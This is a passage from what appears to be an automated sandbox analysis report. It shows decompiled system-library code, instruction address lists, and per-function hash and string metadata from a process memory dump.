						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0102F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0103DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0102B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0102B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0102E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0102A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                          0x00feb171
                          0x00feb171
                          0x00feb171
                          0x00feb171
                          0x00feb171
                          0x00feb176
                          0x00feb17b
                          0x00feb180
                          0x00feb186
                          0x00feb18f
                          0x00feb198
                          0x00feb1a4
                          0x00feb1aa
                          0x01044802
                          0x01044802
                          0x01044805
                          0x0104480c
                          0x0104480e
                          0x00feb1d1
                          0x00feb1d3
                          0x00feb1de
                          0x00feb1de
                          0x01044817
                          0x0104481e
                          0x01044820
                          0x01044822
                          0x01044822
                          0x01044824
                          0x01044824
                          0x0104482a
                          0x00000000
                          0x00000000
                          0x01044835
                          0x0104483a
                          0x0104483d
                          0x0104483f
                          0x01044842
                          0x01044842
                          0x01044842
                          0x01044846
                          0x0104484c
                          0x0104484e
                          0x01044851
                          0x01044851
                          0x01044853
                          0x01044854
                          0x01044854
                          0x01044858
                          0x0104485a
                          0x0104485a
                          0x0104485d
                          0x0104485f
                          0x01044861
                          0x01044861
                          0x01044866
                          0x0104486b
                          0x0104486e
                          0x01044871
                          0x01044876
                          0x01044876
                          0x01044878
                          0x0104487b
                          0x01044884
                          0x01044884
                          0x00000000
                          0x0104487d
                          0x0104487d
                          0x01044882
                          0x01044889
                          0x01044889
                          0x0104488f
                          0x01044891
                          0x010448e0
                          0x010448e2
                          0x010448e4
                          0x010448e4
                          0x010448e7
                          0x010448e7
                          0x010448ed
                          0x010448f4
                          0x010448f6
                          0x01044951
                          0x01044951
                          0x01044953
                          0x01044953
                          0x01044956
                          0x01044956
                          0x01044958
                          0x01044959
                          0x01044959
                          0x0104495d
                          0x0104495d
                          0x0104495f
                          0x0104495f
                          0x01044965
                          0x01044969
                          0x010449ba
                          0x010449ba
                          0x010449c1
                          0x010449c5
                          0x010449cc
                          0x010449d4
                          0x010449d7
                          0x010449da
                          0x010449e4
                          0x010449e5
                          0x010449f3
                          0x01044a02
                          0x00000000
                          0x01044a02
                          0x01044972
                          0x01044974
                          0x00000000
                          0x00000000
                          0x01044976
                          0x01044979
                          0x01044982
                          0x01044983
                          0x01044984
                          0x0104498b
                          0x0104498d
                          0x01044991
                          0x01044993
                          0x01044999
                          0x0104499d
                          0x010449a2
                          0x010449a2
                          0x010449a2
                          0x01044999
                          0x010449ac
                          0x00000000
                          0x010449b3
                          0x010448f8
                          0x010448fe
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010448fe
                          0x01044895
                          0x0104489c
                          0x010448ad
                          0x010448b2
                          0x010448b5
                          0x010448b7
                          0x010448ba
                          0x010448bc
                          0x010448c6
                          0x010448c6
                          0x010448cb
                          0x010448d1
                          0x010448d4
                          0x010448d8
                          0x010448d8
                          0x00000000
                          0x010448d8
                          0x010448be
                          0x010448c0
                          0x00000000
                          0x00000000
                          0x010448c2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010448c4
                          0x00000000
                          0x01044882
                          0x0104487b
                          0x01044904
                          0x01044906
                          0x00000000
                          0x00000000
                          0x01044908
                          0x0104490e
                          0x00000000
                          0x00000000
                          0x01044910
                          0x01044917
                          0x01044917
                          0x00000000
                          0x01044917
                          0x00feb1ba
                          0x010447f9
                          0x010447fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010447fc
                          0x00feb1c0
                          0x00feb1c0
                          0x00feb1c3
                          0x00feb1cb
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: _vswprintf_s
                          • String ID:
                          • API String ID: 677850445-0
                          • Opcode ID: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                          • Instruction ID: 4acca2f3dfe0f84f097eef1dd9c31b29ab7f904f08ccaccfe8415c9ac5a8e1fd
                          • Opcode Fuzzy Hash: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                          • Instruction Fuzzy Hash: 2A51C1B5D0025A8BEB21CF688885BAEBBF0BF00714F2041BDD899EB282D7754D45DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01012581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: PATH
                          • API String ID: 0-1036084923
                          • Opcode ID: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                          • Instruction ID: cca27a16bf92238830b7feba0443c06178e5c8320f1ecf613b25f0b1912722cc
                          • Opcode Fuzzy Hash: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                          • Instruction Fuzzy Hash: F6C18071D00219DFDB25DF99D881BEEBBF1FF48750F248069E981AB294D738A941CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0101FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                          Download Yara Rule
                          Strings
                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0105BE0F
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                          • API String ID: 0-865735534
                          • Opcode ID: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                          • Instruction ID: e8382970fc5a2d65bfd155e3eb680463d8e8f5685f145ddc1b5ef14940604bb8
                          • Opcode Fuzzy Hash: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                          • Instruction Fuzzy Hash: 77A1F431B0060A8BEB61DB68C4507BEB7E5BF44714F0445A9EE82CB695DB38E805DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FE2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: RTL: Re-Waiting
                          • API String ID: 0-316354757
                          • Opcode ID: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                          • Instruction ID: 33a3bcffa4be35dd66d0adbbbb7ecde21907ecf3c5952ac853c4377697afbf16
                          • Opcode Fuzzy Hash: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                          • Instruction Fuzzy Hash: 87615671E00A969FDB72DB69C840BBE77ECEB84324F1402A6D991972C1D7349D019782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                          • Instruction ID: af6782fd764b6ebd0c37c1b4aad757565a746bdfba7fd8dbad8f360d486e4db5
                          • Opcode Fuzzy Hash: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                          • Instruction Fuzzy Hash: B5519A713043829BE325DF28E8D4B9BBBE5EB84704F04096DFAC687690D771E805CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0101F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction ID: 8fdc252dfe0d6c5d905de37420e6de76e9be9535c9558e5b9a07d9786e5ff2c5
                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                          • Instruction Fuzzy Hash: 85518F716047119FD321DF29C840AABBBF9FF48750F00892DFA9597690E7B4E914CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01063540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: BinaryHash
                          • API String ID: 0-2202222882
                          • Opcode ID: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                          • Instruction ID: 89d7be19221ae4357cf1ace0147799c841b77539bd02bb48f30a7a9ee2c44224
                          • Opcode Fuzzy Hash: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
                          • Instruction Fuzzy Hash: CD4142F1D0052DABDB21DA50CC85FEEB77CAB54714F0085A5EA49AB241DB319E888FE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010B05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: `
                          • API String ID: 0-2679148245
                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                          • Instruction ID: 8f8828e649ad0adde63528c3903b2256daef612217638f83c7c50d1dcaf3490c
                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                          • Instruction Fuzzy Hash: C431E232700306ABE710DE28CC85FDB7BE9AB88754F144229FA949B284D770E904C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01063884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: BinaryName
                          • API String ID: 0-215506332
                          • Opcode ID: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                          • Instruction ID: abc62330088f1cb655fa51e9ca1aee9a0d5264c94ab0b686c16cdd741b950524
                          • Opcode Fuzzy Hash: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
                          • Instruction Fuzzy Hash: BF31E832D0051AAFEB16DA58C945EAFB7B8FB44720F014169E998AB251D7319E00CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0101D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                          • Instruction ID: ca14e4fdd16c7439f7763d37c1c05a328750590d319476f86225a275e18cb6be
                          • Opcode Fuzzy Hash: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                          • Instruction Fuzzy Hash: 15318DB1508305AFD361DF68C9849AFBBE8EB99654F004A2EF9D483250D739DD04CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FF1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: WindowsExcludedProcs
                          • API String ID: 0-3583428290
                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction ID: c783135cc6a4f70489bb8d137e949dc63ce2adf953483c82da9aca5cb66aaaaf
                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction Fuzzy Hash: 7F21F877A4112DEBDB229A598880FEB77ADFF51B60F154465FA84DB210D731DC00E7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Actx
                          • API String ID: 0-89312691
                          • Opcode ID: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                          • Instruction ID: 3c3391eab8ead43a6fa658cd2b53713e99f00440e09b966be73b18e317ebbfd1
                          • Opcode Fuzzy Hash: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                          • Instruction Fuzzy Hash: 0811BE35304A038BFBB78E1C849073A76D5BB85664F24456AE9E9CB3D1EBB0C841A343
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01098DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          • Critical error detected %lx, xrefs: 01098E21
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Critical error detected %lx
                          • API String ID: 0-802127002
                          • Opcode ID: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                          • Instruction ID: 64696c56d821fdeb713962ba62a81f2dca78ba59eaf1ba9eb00c9498db4c34ac
                          • Opcode Fuzzy Hash: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                          • Instruction Fuzzy Hash: 8F1175B5D00348EADF24DFA889157DCBBB4BB05311F20825EE1A9AB392C3340602DF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0107FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          Strings
                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0107FF60
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                          • API String ID: 0-1911121157
                          • Opcode ID: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                          • Instruction ID: 22e82df3c7b1381ea6e4eb39bbf7a8bc22f609627ef3b63b6ed7ea72e4f0cb2c
                          • Opcode Fuzzy Hash: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                          • Instruction Fuzzy Hash: C4110475910545EFDB22EB54CC48FD8BBF2FF04714F548084F5885B2A1CB399940DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010B5BA5, Relevance: .6, Instructions: 592COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
                          • Instruction ID: bbdfdef7dd33e46af40618fbcafff32cf3e695039f872339ba39271305e0eed4
                          • Opcode Fuzzy Hash: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
                          • Instruction Fuzzy Hash: CF42487590122A8FDB64CF68C880BE9BBF1FF49704F1481EAD98DAB242D7359985CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004120, Relevance: .4, Instructions: 444COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
                          • Instruction ID: 145932e766d84c0b6bf606a46736bbb711e624f2dd80aa0cdc7229e9d1058075
                          • Opcode Fuzzy Hash: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
                          • Instruction Fuzzy Hash: 8AF18D706082118FE765CF19C480A7AB7E1FF88714F45896EFAC6CB291E738D981CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010120A0, Relevance: .4, Instructions: 420COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
                          • Instruction ID: cc636def472893938a569dd11de42e03a4e54261d53da5ac9eb7cf3793bb1200
                          • Opcode Fuzzy Hash: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
                          • Instruction Fuzzy Hash: 61F102316083419FEBA6CF2CC8407AF7BE1AF95324F24859DE9D59B285D739D841CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FFD5E0, Relevance: .4, Instructions: 353COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
                          • Instruction ID: 6fb51acb59f20522c2877c12fc0ce250e60e1bdc0cce265baeafb91d4780d94d
                          • Opcode Fuzzy Hash: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
                          • Instruction Fuzzy Hash: C8E1D271A013198FEB34DF29C880BB9B7B2BF85314F1441E9DA899B2A1DB34DD81DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FF849B, Relevance: .3, Instructions: 290COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
                          • Instruction ID: fe1b3f665e4d3a216fc5ee96dbba2d065b2203e1230272d9cfadc7591e037b1a
                          • Opcode Fuzzy Hash: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
                          • Instruction Fuzzy Hash: CBB18FB1E00209DFDB15DF98C984BAEBBB5BF48354F204129E645AB355DB74AC42DB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0101513A, Relevance: .3, Instructions: 258COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
                          • Instruction ID: 83049ef9dcb2c374849a235ed24b54e404256e4837f4472eb7aa50790d5caa2f
                          • Opcode Fuzzy Hash: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
                          • Instruction Fuzzy Hash: E8C130755093818FD394CF28C480A5AFBE1BF89304F544AAEF9D98B392D735E845CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010103E2, Relevance: .3, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
                          • Instruction ID: c3e968f067e96caa4a9417e80f07f41a99be4a726ee6f86d293658605e134f65
                          • Opcode Fuzzy Hash: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
                          • Instruction Fuzzy Hash: 68910971E002159FEB71AA6CC844BEE7BE4AB05714F0502A5FDD1EB2D9EB789C80C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FEC600, Relevance: .2, Instructions: 225COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
                          • Instruction ID: 781ee5f66caf191f3464b30122eb50fc78bf57d00a4892c98ad7a8118e926f20
                          • Opcode Fuzzy Hash: bf27210d58167a73c32a324ad19fc6633702eed789df4818a98a4f191a2ffe05
                          • Instruction Fuzzy Hash: 8381A2756042428BEBA6CE58C880B7F77E9FB84350F54486AEEC59B241D330DD45DBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0107B8D0, Relevance: .2, Instructions: 199COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
                          • Instruction ID: bd58453a90ab2cea533d9b3df92666b8f684408af7b5e5c2c4acf7a7e1c6c1c8
                          • Opcode Fuzzy Hash: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
                          • Instruction Fuzzy Hash: 4D710132A00702AFE732EF18CC44FAABBE5EF44724F144568E6D5876A0DBB5E940CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01066DC9, Relevance: .2, Instructions: 199COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                          • Instruction ID: 7d4dab4bbff64a98d51aa9b0d907e67a8dd4c3c3adade51848820e6cda7f93a2
                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                          • Instruction Fuzzy Hash: 86717C71A0061AEFDB11DFA8C984AEEBBF9FF48714F104069E545E7290DB34AA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FE52A5, Relevance: .2, Instructions: 161COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
                          • Instruction ID: 31c2e80bd2175854b6f4eb26d31e4dfb3707a9291b089906fecd16ec9f94e5a9
                          • Opcode Fuzzy Hash: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
                          • Instruction Fuzzy Hash: CF51FC71205792ABD322EF29C841B67BBE4FF50B14F10082EF6C597662E774E804DB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01012AE4, Relevance: .2, Instructions: 159COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
                          • Instruction ID: ce2f959345b10d6cae98992690af84014f318e19235f786b2fd214a3ad5a74ff
                          • Opcode Fuzzy Hash: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
